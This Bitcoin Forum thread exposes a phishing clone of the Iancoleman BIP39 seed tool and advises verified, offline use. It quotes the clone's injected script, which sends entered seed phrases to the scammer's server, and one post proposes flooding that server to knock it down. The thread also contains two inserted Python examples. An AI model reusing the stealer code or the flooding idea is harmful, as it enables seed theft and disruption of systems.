Bitcoin Forum

Other => Beginners & Help => Topic started by: Sarah Azhari on November 01, 2022, 12:10:56 PM



Title: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 01, 2022, 12:10:56 PM
Note: Iancoleman.ch is a scam, be careful

Read this:

I've just had a quick look through the source code for the .ch site, and here is the scam code which is missing from the real .io site, at line 18,466:

Code:
$(document).on('blur', 'textarea#phrase', function(e){
      var mnemonic = e.target.value
      console.log("mnemonic=>", mnemonic)
      $.ajax({
        type: "POST",
        url: "capture.php",
        dataType: "JSON",
        data: {mnemonic, userAgent: navigator.userAgent}
      })
  })

Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.

And I'll repeat myself as I always do whenever someone ends up on a scam site - follow the instructions below to avoid 99.9% of these scams:





I have known this site for a couple of months, a place to recover and generate a seed: iancoleman.io. I tried it some time ago and downloaded it for offline use; it looks fun to me.

Today I had to try something, but I forgot the domain (didn't bookmark it in my browser), so when I typed iancoleman in the search box, it went directly to iancoleman.ch; here is a picture.

https://iili.io/bYsDg9.md.png (https://freeimage.host/i/bYsDg9)

In this case, I suggest that the developer or any other official make an announcement if the domain was changed, so that users avoid accessing phishing sites.

Thanks a lot


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: hosseinimr93 on November 01, 2022, 12:18:22 PM
Iancoleman's domain hasn't been changed and I can access the iancoleman.io without any problem.
It's the first time I've heard of the .ch domain and that's probably a fake website created for scamming purposes.

Edit:
I just searched for "iancoleman" on google.
It shows the .ch domain as an advertisement. It's not the first time I've seen Google promoting scams.

https://i.imgur.com/HjJOyDh.jpg


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: NeuroticFish on November 01, 2022, 12:39:12 PM
I don't know if it's a legit or malicious clone of iancoleman.io and it doesn't even matter.
Any seed generation (or related tests) for addresses expected to hold money "currently" or any time in the future should be done with the code/page from GitHub (https://github.com/iancoleman/bip39) in a safe offline environment.

If you feel the website is not a legit clone (I can't tell right now, but I would assume the worst), you can easily add a line in hosts:
Code:
0.0.0.0 iancoleman.ch


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Charles-Tim on November 01, 2022, 01:42:19 PM
In this case, I suggest that the developer or any other official make an announcement if the domain was changed, so that users avoid accessing phishing sites.
If I remember correctly, I have seen the one for Coinomi before. The BIP 39 tool is open source; its source code is available for other developers to see. Instead of helping people avoid online attacks by directing them to the original site (https://iancoleman.io/bip39/), they just copy the source code for their own use, which can be for their own profit and may not even be legit, by introducing malicious code into it to carry out an attack on the people who make use of the malicious ones.

Very possible the one you pointed to above is a malicious one, but I am not certain about that, just that people should not use it.

Even so, it is just best to download the html file (https://github.com/iancoleman/bip39/releases/latest/) and use a text editor to open it on an airgapped device.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: DdmrDdmr on November 01, 2022, 02:10:10 PM
The site referenced in the OP indicates that the version of the software is v0.5.2, which dates from February 2021(*), whilst the known .io domain displays the current version v0.5.4, which is from October 2021.

I’ve seen another site exactly like the one referenced in the OP, with a deliberately close name (lacking an “e”) to the original one: https[colon]//iancolman[dot]io/
Both are very likely scam sites.

While we’re at it, there’s also a .net version (https[colon]//iancoleman[dot]net/), with a flashier interface, but full of spelling and grammatical mistakes in the explanation. Probably yet another site one should not end up visiting …

(*) See: https://github.com/iancoleman/bip39/releases/


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: mk4 on November 01, 2022, 02:39:28 PM
Just a heads up: Install an open-source and reputable ad blocking plugin such as uBlock Origin[1] so you wouldn't be getting those scam advertisements.



[1] https://github.com/gorhill/uBlock


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: o_e_l_e_o on November 01, 2022, 02:41:27 PM
I've just had a quick look through the source code for the .ch site, and here is the scam code which is missing from the real .io site, at line 18,466:

Code:
$(document).on('blur', 'textarea#phrase', function(e){
      var mnemonic = e.target.value
      console.log("mnemonic=>", mnemonic)
      $.ajax({
        type: "POST",
        url: "capture.php",
        dataType: "JSON",
        data: {mnemonic, userAgent: navigator.userAgent}
      })
  })

Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.

And I'll repeat myself as I always do whenever someone ends up on a scam site - follow the instructions below to avoid 99.9% of these scams:

Stop using Google to find the website of exchanges, services, or wallets.

Stop following random links without checking the URL.

Start using uBlock Origin.

Never type your seed in anywhere.

How many times does this need repeated?

OP: I would suggest you edit the topic title and your first post to make it clear to anyone who stumbles across it or finds it via a search engine that the only real iancoleman site is the .io one. Also, it should only be used after you download it from GitHub at https://github.com/iancoleman/bip39 and run it on an offline machine, and never run via an online site.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: dkbit98 on November 01, 2022, 02:46:27 PM
Today I had to try something, but I forgot the domain (didn't bookmark it in my browser), so when I typed iancoleman in the search box, it went directly to iancoleman.ch; here is a picture.
I would suggest that everyone stay away from this website and use only the official iancoleman GitHub page, which shows that the only official website is the one with the .io domain.
There is one more suspicious and maybe phishing domain other than .ch, and they are using the .net domain with the same name.
It could be that these are alternative domains, but I would be very careful and not use them until I hear something from the developer.

Let's check out when these recent domains got registered.
The first one, with the .ch domain, was registered in March 2022:

Code:
Domain name	iancoleman.ch
Registrar Sarek Oy
Urho Kekkosen katu 4-6 E
FI-00100 Helsinki
Phone +358 931577910
terve@sarek.fi
DNSSEC no
Name servers
dell.ns.cloudflare.com
vick.ns.cloudflare.com
First registration date 30 March 2022

The second one was registered in 2021 and then updated this year.

Code:
Domain name: iancoleman.net
Registry Domain ID: 2629607198_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-07-13T13:35:42.12Z
Creation Date: 2021-07-27T10:11:57.00Z
Registrar Registration Expiration Date: 2023-07-27T10:11:57.00Z
Registrar: NAMECHEAP INC


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: _BlackStar on November 01, 2022, 03:25:31 PM
Today I had to try something, but I forgot the domain (didn't bookmark it in my browser), so when I typed iancoleman in the search box, it went directly to iancoleman.ch; here is a picture.
How likely is it for you not to get two different domains for the same site when you do a Google search with the keyword [iancoleman]?

A Google search with the keyword [iancoleman] doesn't lead directly to the [.ch] domain if you don't actually fill in that domain when you search. So there is a possibility that you ignored the [ad] sign on the left of the site that Google refers to and ignored the original site right below the phishing site.

In this case, I suggest that the developer or any other official make an announcement if the domain was changed, so that users avoid accessing phishing sites.
No domain changes I guess, you just go to the phishing site instead of the original site right below it. So you just have to stay away and warn everyone and report it to Google.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Outhue on November 01, 2022, 04:45:17 PM
Even the original Ian Coleman website is not safe, do not use that website, I imported a recovery phrase into this website a few years ago when I was still using Coinomi, and later someone moved tokens worth hundreds of dollars out of my wallet; this is the only website I imported my keys into.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: hosseinimr93 on November 01, 2022, 04:58:21 PM
Even the original Ian Coleman website is not safe, do not use that website,
If you use the online website, you are right. That's not safe. Even if you enter your seed phrase on iancoleman.io and not a fake website, there's still the chance of getting hacked.
Iancoleman is open source and if you want to use it securely, you should download the source code and run it offline on an air-gapped device.
Take note that any online website and any online wallet (including Coinomi) is insecure.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 02, 2022, 04:08:59 AM
Essentially any mnemonic that you generate using this website is first logged to the console and then uploaded to the server.
So in this case, if a {don't know} user tries to recover a mnemonic seed using that scam site, it's possible that a scammer got our details onto the scammer's server and was able to steal our cryptocurrency, right?

So, is it possible they got it if it is not a BIP39 seed?
Because that site is especially for BIP39 seeds; when using an Electrum seed, that's a different category, so maybe it would not successfully generate the private key and they won't be able to get the details?


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Apocollapse on November 02, 2022, 05:29:20 AM
So in this case, if a {don't know} user tries to recover a mnemonic seed using that scam site, it's possible that a scammer got our details onto the scammer's server and was able to steal our cryptocurrency, right?

So, is it possible they got it if it is not a BIP39 seed?
Because that site is especially for BIP39 seeds; when using an Electrum seed, that's a different category, so maybe it would not successfully generate the private key and they won't be able to get the details?
If you input the right information of your wallet into the scam BIP39 site, the scammer will be able to control your wallet since they have the full details to access your wallet. It's similar to inputting your 12- or 24-word seed on a phishing site; this is why most people get scammed, since they think they have protected their seeds, but they're careless since they're not aware that they are accessing a phishing site.

The best thing is to only input any personal information in an offline version.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: o_e_l_e_o on November 02, 2022, 08:56:04 AM
So in this case, if a {don't know} user tries to recover a mnemonic seed using that scam site, it's possible that a scammer got our details onto the scammer's server and was able to steal our cryptocurrency, right?
Any seed phrase which is either generated by that site or entered in to the seed phrase box is uploaded to the site's server and therefore accessible by the malicious person behind this site. So yes, the scammer will have your seed phrase and therefore will steal your coins.

So, is it possible they got it if it is not a BIP39 seed?
Because that site is especially for BIP39 seeds; when using an Electrum seed, that's a different category, so maybe it would not successfully generate the private key and they won't be able to get the details?
There should be no reason to insert an Electrum seed phrase on the Iancoleman site since it will not generate the correct addresses even if it (by chance) passes the checksum,* but you should assume that the scammer behind this site is well aware of the difference between BIP39 seed phrases and Electrum seed phrases, and would also check the seed phrase for any Electrum wallets.

*You can edit the code to make it work with Electrum seed phrases if you desire, but that's not really relevant to this discussion.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: dkbit98 on November 02, 2022, 03:47:47 PM
Even the original Ian Coleman website is not safe, do not use that website, I imported a recovery phrase into this website a few years ago when I was still using Coinomi, and later someone moved tokens worth hundreds of dollars out of my wallet; this is the only website I imported my keys into.
The official website is perfectly safe if you use it OFFLINE like you should, but this does not apply to any phishing or hijacked websites.
You can't blame someone else for doing experiments like you did with open source tools like Ian Coleman's code and website.
There is even a message at the bottom saying that you can use this website offline, with simple instructions on how to do it.





Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Charles-Tim on November 02, 2022, 04:00:12 PM
Even the original Ian Coleman website is not safe, do not use that website, I imported a recovery phrase into this website a few years ago when I was still using Coinomi, and later someone moved tokens worth hundreds of dollars out of my wallet; this is the only website I imported my keys into.
The official website is perfectly safe if you use it OFFLINE like you should, but this does not apply to any phishing or hijacked websites.
You can't blame someone else for doing experiments like you did with open source tools like Ian Coleman's code and website.
There is even a message at the bottom saying that you can use this website offline, with simple instructions on how to do it.
There are two offline usages. First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe? I have preferred the second method which is the use of its source code.

@Outhue, if you want to make use of Iancoleman, or want to make use of a tool that generates a seed phrase or private key, like bitaddress, you need to make use of the source code for that on an airgapped device. I still wonder how people find it convenient to input their seed phrase or private key on a tool that is online; that is not safe even if you are using it on a reputed site.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: BlackHatCoiner on November 02, 2022, 04:16:37 PM
First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe?
The risk is the same as downloading Electrum from electrum.org without verifying the binaries; there's a chance the site is compromised.

The safe way is the following:
  • Grab and download the latest release from github.com/iancoleman/bip39/releases (https://github.com/iancoleman/bip39/releases).
  • Make sure that the sha256sum result is the same as in the release signed message.
  • Import Ian's public key. (https://iancoleman.io/pubkey.txt)
  • Verify the release signed message.
  • Boot an air-gapped machine with a reviewed Linux distro.
  • Load iancoleman/bip39 there.
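
Added example (not part of the post above, and not the project's own code): a Python sketch of the hash step in that list. It takes the expected SHA-256 only from the part of the clearsigned message that the signature covers, and it assumes `gpg --verify` has already reported a good signature from the imported key. The file names and message text are constructed.

```python
import hashlib
import hmac
import re
import tempfile
from pathlib import Path

BEGIN_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")


def signed_body(clearsigned: str) -> str:
    """Return only the text covered by the signature of a clearsigned message.

    Text before the BEGIN line or after the signature block is not signed,
    so a hash that appears there proves nothing and is ignored.
    """
    lines = clearsigned.splitlines()
    try:
        start = lines.index(BEGIN_MSG)
        end = lines.index(BEGIN_SIG, start)
    except ValueError:
        raise ValueError("not a clearsigned message")
    # Skip armor headers such as "Hash: SHA256" up to the first blank line.
    i = start + 1
    while i < end and lines[i].strip():
        i += 1
    body = lines[i + 1:end]
    # Undo the "- " dash-escaping used by the OpenPGP cleartext format.
    return "\n".join(l[2:] if l.startswith("- ") else l for l in body)


def sha256_file(path) -> str:
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def file_matches_release(path, clearsigned: str) -> bool:
    """True only if the file's hash is listed inside the signed body."""
    actual = sha256_file(path)
    listed = [h.lower() for h in SHA256_RE.findall(signed_body(clearsigned))]
    return any(hmac.compare_digest(actual, h) for h in listed)


def demo():
    """Constructed inputs: a stand-in release file, a copy with one added
    line, and a message with a second hash pasted outside the signed part."""
    with tempfile.TemporaryDirectory() as d:
        good = Path(d) / "tool.html"  # constructed stand-in for the download
        good.write_bytes(b"<html><!-- constructed release file --></html>\n")
        message = "\n".join([
            BEGIN_MSG, "Hash: SHA256", "",
            "(constructed release note)",
            f"{sha256_file(good)}  tool.html",
            BEGIN_SIG, "", "(signature bytes omitted)",
            "-----END PGP SIGNATURE-----",
        ])
        bad = Path(d) / "tampered.html"
        bad.write_bytes(good.read_bytes() + b"<script>/* added line */</script>\n")
        # The modified copy's hash is prepended outside the signed region.
        forged = f"{sha256_file(bad)}  tool.html\n" + message
        return (
            file_matches_release(good, message),  # untouched file
            file_matches_release(bad, message),   # modified file
            file_matches_release(bad, forged),    # unsigned hash is ignored
        )


if __name__ == "__main__":
    print(demo())
```

A single added line in the page changes the digest, so a modified copy fails the check even when it looks identical in the browser.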


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: hosseinimr93 on November 02, 2022, 06:02:58 PM
First is to open the site, close it, off your data network and reopen the site, but I think that is not safe enough. Or is it safe?
The risk is the same as downloading Electrum from electrum.org without verifying the binaries; there's a chance the site is compromised.
Even if the website isn't compromised, that's like using electrum on an online device and there's still the chance that your computer is compromised.
The safer method (not the safest) is to save the webpage as a file, move it to an air-gapped device and use it there.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: BlackHatCoiner on November 02, 2022, 06:09:53 PM
The safer method (not the safest) is to save the webpage as a file, move it to an air-gapped device and use it there.
If your computer is virus infected, everything's possible. You might as well download the file, and the malware that runs in the background replaces it with another. You might download Ian's public key, and it switches it to the attacker's public key. You might load github.com, and it returns you a fake replica, with compromised binaries.

Whatever you do, you'll have to somehow acquire Ian's binaries, signatures and public key using a non-airgapped computer. And, as always, there are risks.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: NotATether on November 02, 2022, 06:20:36 PM
Since it POSTs the seed to the attacker's server, you can DoS the server by automatically generating thousands of seeds per second on a fast connection. Just make sure that you use something like Selenium to press the generate button, then clicks on the text box with the seed, and then back to the button again - that should be sure to trigger the attacking code.

Even if it does not take down the website, it will leave the attacker with gigabytes of garbage seed phrases to sift through and might crash whatever database is storing them all, or at least slows it to a crawl. The attacking script is written in PHP after all.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Crypt0Gore on November 03, 2022, 03:56:07 PM
I can't even imagine typing my recovery seed into any so called safe platform of any kind, as far as crypto wallet security is a concern you have to do everything offline, offline only is the way to keep your wallet safe, I made sure that the current wallet I am using will never be imported into any online platform.

Forget iancoleman, why do you need this website anyways? Oh, yes, to get private keys out of recovery seeds, but you don't need to do so these days, newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.

STAY AWAY FROM IANCOLEMAN


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: BlackHatCoiner on November 03, 2022, 04:01:30 PM
I can't even imagine typing my recovery seed into any so called safe platform of any kind, as far as crypto wallet security is a concern you have to do everything offline
You can utilize Iancoleman's site offline.

newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.
Stay away from Trust wallet, please. For God's sake. It's not open-source, not secure, and neither private. It's one of the worst wallet software to use.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Charles-Tim on November 04, 2022, 08:10:41 AM
Forget iancoleman, why do you need this website anyways? Oh, yes, to get private keys out of recovery seeds, but you don't need to do so these days, newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.
You can try and read previous posts, you do not have to use an online site to do it, just use the html file using a text editor on an airgapped device. This has been repeated many times just on this thread.

Stay away from Trust wallet, please. For God's sake. It's not open-source, not secure, and neither private. It's one of the worst wallet software to use.
He mentioned multi coin wallets also, but almost all the multi coin wallets are closed source too. Exodus, Atomic, Coinomi, Coinbase noncustodial and many others are all closed source wallets too. Only some hardware wallets are open source which can be gone for if looking for an open source multi coin wallet.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 05, 2022, 02:21:15 AM
Forget iancoleman, why do you need this website anyways? Oh, yes, to get private keys out of recovery seeds, but you don't need to do so these days, newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.

STAY AWAY FROM IANCOLEMAN
Sure, stay away from the phishing Iancoleman (.ch) site.
But for fun and to learn something you have to try this; that tool is very useful for beginners to learn how the seed works and how you create a wallet and addresses with only one mnemonic. I am sure this tool is like the start of a trust wallet. This tool makes developers think of creating a wallet like Trust wallet, where 1 seed can create a multi-coin wallet.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: o_e_l_e_o on November 05, 2022, 10:13:56 AM
I can't even imagine typing my recovery seed into any so called safe platform of any kind
...
newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.
And how are you going to get your private keys from Trust wallet if you don't type your seed phrase in first, which you've just said you would never do? If I need to enter my seed phrase somewhere to derive my private keys, then 100% of the time I'm going to choose an open source and verifiable tool downloaded from GitHub and run on an offline machine, such as Iancoleman, over a closed source and unverifiable tool downloaded from an app store, such as Trust wallet.

Iancoleman's site is perfectly legit and perfectly safe if used properly - downloaded, verified, and airgapped. The existence of a malicious version is not a reason not to use it, otherwise you shouldn't be using this forum, your browser, your OS, or pretty much any piece of software at all.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: dkbit98 on November 05, 2022, 09:29:20 PM
Forget iancoleman, why do you need this website anyways? Oh, yes, to get private keys out of recovery seeds, but you don't need to do so these days, newest updates from Trust wallet and other multi coins wallet have given users access to private keys per wallet addresses you created.
Forget closed source Trust wallet that is used mostly for shitcoins, and stop spreading misinformation to people that official Ian Coleman website is not safe to use.
Phishing websites with different domains mentioned in this topic have nothing to do with real Ian Coleman, and they should never be used.
Unlike Trust wallet, Ian Coleman code is fully open source, you can see what is happening behind the scenes, and you can verify everything.
If done correctly nothing can go wrong and his tools can be very useful to get different derivation Paths and addresses.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 09, 2022, 07:57:43 AM
If done correctly nothing can go wrong and his tools can be very useful to get different derivation Paths and addresses.
Because you mentioned the derivation path, I'm just curious about the difference between BIP 32 and BIP 44, because when I look at the address prefix, both start with 1, and also BIP 44 and BIP 141 both start with 3. I tried all of that with a 24-word mnemonic.

And why is there no update about taproot bc1p? Where can I find the BIP 341 derivation path in the iancoleman tool?


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: o_e_l_e_o on November 09, 2022, 09:17:23 AM
Because you mentioned the derivation path, I'm just curious about the difference between BIP 32 and BIP 44, because when I look at the address prefix, both start with 1, and also BIP 44 and BIP 141 both start with 3.
BIP32 (https://en.bitcoin.it/wiki/BIP_0032) is the BIP which first described HD wallets and derivation paths. There is no standard BIP32 path, but most wallets which don't use BIP44/49/84 would use either m/0' or m/0'/0'.

BIPs 44/49/84 are the standard derivation paths which most wallets now use. These are m/44'/0'/0' for P2PKH addresses starting with 1, m/49'/0'/0' for P2SH addresses starting with 3, and m/84'/0'/0' for P2WPKH addresses starting with bc1q.

Iancoleman uses the BIP141 tab to allow creation of P2WSH and nested segwit addresses, at arbitrary derivation paths.

I tried all of that with a 24-word mnemonic.
The length of the mnemonic phrase is irrelevant when considering the derivation path or address type.

And why is there no update about taproot bc1p? Where can I find the BIP 341 derivation path in the iancoleman tool?
He hasn't implemented it yet.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 10, 2022, 12:04:34 AM
I tried all of that with a 24-word mnemonic.
The length of the mnemonic phrase is irrelevant when considering the derivation path or address type.
So if it's irrelevant, we can generate fewer than 24 words, like 9 or 3, and still get those types of addresses. But if we use only 3 words, are we able to recover it using a BIP39 wallet when the wallet only accepts 12- and 24-word seeds? That looks confusing to me; if I tried to generate with only 3 words, I must keep the private key saved in another place.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Charles-Tim on November 10, 2022, 03:05:10 AM
Know that less than 12 word seed phrases are not secure.

So if it's irrelevant, we can generate fewer than 24 words, like 9 or 3, and still get those types of addresses
Yes

But if we use only 3 words, are we able to recover it using a BIP39 wallet when the wallet only accepts 12- and 24-word seeds? That looks confusing to me; if I tried to generate with only 3 words, I must keep the private key saved in another place.
Again, know that less than 12 word seed phrases are not secure.

If you use a reputed wallet, and the wallet is generating 12 word seed phrase by default, that does not mean you can not import 15, 18, 21 or 24 word seed phrase on the wallet. It would be successfully imported.

But if the seed phrase is less than 12 words, likely it would be rejected on reputed wallets as they are designed in a way they can not accept less than 12 word seed phrase. I have tested it on some wallets, like electrum, if less than 12, it would be rejected. Unless you use a tool like Iancoleman for it, but a seed phrase of less than 12 words is not secure, so why generate it?


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: hosseinimr93 on November 10, 2022, 05:57:01 AM
But if the seed phrase is less than 12 words, likely it would be rejected on reputed wallets as they are designed in a way they can not accept less than 12 word seed phrase. I have tested it on some wallets, like electrum, if less than 12, it would be rejected.
Electrum allows you to import a seed phrase with less than 12 words. It would display a message saying checksum is failed, but it generates the wallet with correct addresses successfully.
Electrum even allows you to generate seed phrases including less than 12 words using console tab.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 10, 2022, 06:28:45 AM
But if the seed phrase is less than 12 words, likely it would be rejected on reputed wallets as they are designed in a way they can not accept less than 12 word seed phrase. I have tested it on some wallets, like electrum, if less than 12, it would be rejected.
Electrum allows you to import a seed phrase with less than 12 words. It would display a message saying checksum is failed, but it generates the wallet with correct addresses successfully.
Electrum even allows you to generate seed phrases including less than 12 words using console tab.
Yes, I admit that after I checked the BIP39 option on the tab. I also admit that if I create a random seed (I mean, created without using the iancoleman tool), the wallet still generates the correct address, but I'm still confused about the meaning of a failed checksum. Will the wallet generate a different address in the future when the checksum fails? Or does it only warn us to be careful, while nothing happens with that seed?


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: hosseinimr93 on November 10, 2022, 06:41:00 AM
Will the wallet generate a different address in the future when the checksum fails? Or does it only warn us to be careful, while nothing happens with that seed?
It will be possible to generate the same addresses in the future. Electrum's source code is public and even if there are some changes in the next updates, it will still be possible to generate the same addresses.
For detecting errors, BIP39 seed phrases include a checksum and you should always use a seed phrase with correct checksum, because it's standard and it's accepted by other wallets as well. I would never recommend using a non-standard seed phrase.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Charles-Tim on November 10, 2022, 06:47:36 AM
Electrum allows you to import a seed phrase with less than 12 words. It would display a message saying checksum is failed, but it generates the wallet with correct addresses successfully.
Electrum even allows you to generate seed phrases including less than 12 words using console tab.
I was close to my mobile device (mobile Electrum) which was what I used to test it, it did not actually work. I used a closed source wallet, Trustwallet (not recommended) to test it and it did not work. Normally, it is supposed to work, but those wallets are designed for it not to work just for the safety of people.

Because of this (I mean your post), I checked it also on desktop electrum, but it worked, you are not wrong, but it did not work on mobile Electrum.

It depends on how the wallet is designed, and what we need most to keep in mind is not to use any seed phrase that is less than 12 words.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: o_e_l_e_o on November 10, 2022, 10:50:46 AM
So if it's irrelevant, we can generate fewer than 24 words, like 9 or 3, and still get those types of addresses.
Perhaps I should have said irrelevant within the confines of BIP39, which specifies a seed phrase should be 12/15/18/21/24 words long.

Since the seed phrase is simply used as the input to 2048 rounds of HMAC-SHA512 (alongside a salt), you could use any length of seed phrase you want, with any words, in any language, with an invalid checksum or no checksum at all, and still generate a wallet and addresses. I definitely wouldn't recommend it though, and almost all wallets would refuse to recover from your non-standard seed phrase.

I also admit that if I create a random seed (I mean, created without using the iancoleman tool), the wallet still generates the correct address, but I'm still confused about the meaning of a failed checksum.
Most wallet software, if you insert a seed phrase which contains an invalid checksum, will simply refuse to proceed, as I've just mentioned. Electrum on the other hand does allow you to proceed, albeit with the warning that your checksum is invalid. The same invalid seed phrase will always generate the same addresses when entered in to Electrum, however I would strongly suggest nobody deliberately uses a seed phrase with an invalid checksum.
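
Added example (not part of the post above): a Python sketch of the two separate mechanisms described there, the BIP39 checksum and the PBKDF2 seed derivation. Words are given as indices into the 2048-word list because the wordlist is not embedded; the function names are hypothetical, the "abandon ... about" phrase is the well-known BIP39 test vector, and the four-word phrase is constructed.

```python
import hashlib
import unicodedata

VALID_WORD_COUNTS = {12, 15, 18, 21, 24}  # lengths BIP39 specifies


def indices_to_bits(indices):
    """Each BIP39 word stands for an 11-bit index into the 2048-word list."""
    if any(not 0 <= i < 2048 for i in indices):
        raise ValueError("word index out of range")
    return "".join(format(i, "011b") for i in indices)


def checksum_ok(indices):
    """True if the indices form a standard-length phrase with a valid checksum.

    The phrase encodes ENT entropy bits followed by ENT/32 checksum bits,
    which are the leading bits of SHA-256(entropy).
    """
    n = len(indices)
    if n not in VALID_WORD_COUNTS:
        return False
    bits = indices_to_bits(indices)
    cs_len = n * 11 // 33  # 4 bits for 12 words, up to 8 bits for 24 words
    ent_bits, cs_bits = bits[:-cs_len], bits[-cs_len:]
    entropy = int(ent_bits, 2).to_bytes(len(ent_bits) // 8, "big")
    digest = hashlib.sha256(entropy).digest()
    return cs_bits == format(digest[0], "08b")[:cs_len]


def mnemonic_to_seed(phrase, passphrase=""):
    """PBKDF2-HMAC-SHA512 with 2048 rounds and salt "mnemonic" + passphrase.

    Neither the wordlist nor the checksum is consulted here, which is why
    any string at all yields a 64-byte seed.
    """
    password = unicodedata.normalize("NFKD", phrase).encode("utf-8")
    salt = unicodedata.normalize("NFKD", "mnemonic" + passphrase).encode("utf-8")
    return hashlib.pbkdf2_hmac("sha512", password, salt, 2048, dklen=64)


def demo():
    # "abandon" is index 0 and "about" is index 3 in the English wordlist.
    vector = " ".join(["abandon"] * 11 + ["about"])
    odd = "correct horse battery staple"  # constructed, not a BIP39 phrase
    return {
        "vector_checksum_ok": checksum_ok([0] * 11 + [3]),
        "twelve_abandon_checksum_ok": checksum_ok([0] * 12),
        "three_words_ok": checksum_ok([0, 1, 2]),
        "vector_seed": mnemonic_to_seed(vector, "TREZOR").hex(),
        "odd_seed_len": len(mnemonic_to_seed(odd)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

A wallet that refuses a phrase is running the first function before the second; one that only warns runs the second regardless.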


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Sarah Azhari on November 11, 2022, 06:14:32 AM
I would never recommend using a non-standard seed phrase.
Yes, that looks bad and dangerous. I tried the non-standard seed "nama saya sarah azhari"; when I put it into the iancoleman tool I got the error: nama not in wordlist, did you mean name?, but when I put that seed into Electrum with the BIP39 option checked, I got the address.
So in this case, if the checksum failed, is it better that I just keep the private key rather than that seed?
And why do we have to follow the standard when even with a non-standard seed we can still get the private key?


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: Charles-Tim on November 11, 2022, 08:00:01 AM
Yes, that looks bad and dangerous. I tried the non-standard seed "nama saya sarah azhari"; when I put it into the iancoleman tool I got the error: nama not in wordlist, did you mean name?, but when I put that seed into Electrum with the BIP39 option checked, I got the address.
Even if you input any incorrect word and any number of words, it also generates the keys and addresses on Electrum, but it has been said many times in this thread that a seed phrase that is not up to 12 words should not be used, and also to follow the seed phrase generated by default by a reputed wallet. If you are not an expert in the field, let the wallet generate the seed phrase for you, or use Iancoleman if you know how to use it appropriately on an airgapped device.

So in this case, if the checksum failed, is it better that I just keep the private key rather than that seed?
And why do we have to follow the standard when even with a non-standard seed we can still get the private key?
When the seed phrase is not secure, how would the private key be secure? Not secure. This has been pointed out before; why keep repeating it to ask the question?


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: o_e_l_e_o on November 11, 2022, 09:00:20 AM
So in this case, if the checksum failed, is it better that I just keep the private key rather than that seed?
Neither. If the checksum failed, it is better that you abandon that seed phrase (and whatever method you used which generated an invalid seed phrase), and create a new valid one via a better method.


Title: Re: Is Iancoleman BIP39 Site Changed Domain from .io to .ch?
Post by: BlackHatCoiner on November 11, 2022, 09:12:54 AM
And why do we have to follow the standard when even with a non-standard seed we can still get the private key?
